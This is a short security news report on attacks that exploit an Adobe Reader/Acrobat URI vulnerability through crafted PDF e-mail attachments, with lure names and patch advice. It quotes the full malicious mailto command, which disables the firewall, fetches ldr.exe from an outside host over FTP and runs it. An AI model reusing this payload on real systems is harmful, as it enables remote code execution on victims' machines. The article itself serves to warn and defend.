URI vulnerability in Adobe products is being actively exploited
According to reports on the Full Disclosure security mailing list, active attacks on users using crafted PDF files are already taking place. Files containing a URL which attempts to execute commands on the system by exploiting the known URI vulnerability are being distributed via e-mail. They contain the following sequence of commands:
mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 18.104.22.168>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
The nefarious PDF files have names such as BILL.pdf, INVOICE.pdf and STATEMENT.pdf and have also been seen with subject lines such as INVOICE alacrity, STATEMET indigene and INVOICE. Adobe released Update 8.1.1 for Adobe Reader and Acrobat, which fixes the URI problem, earlier this week. Users should update to the latest version as soon as possible. Adobe advises users who, for whatever reason, are not in a position to install the update, to sever the link between the mailto URI and Adobe products in the registry. Instructions for doing so can be found on the Adobe web site.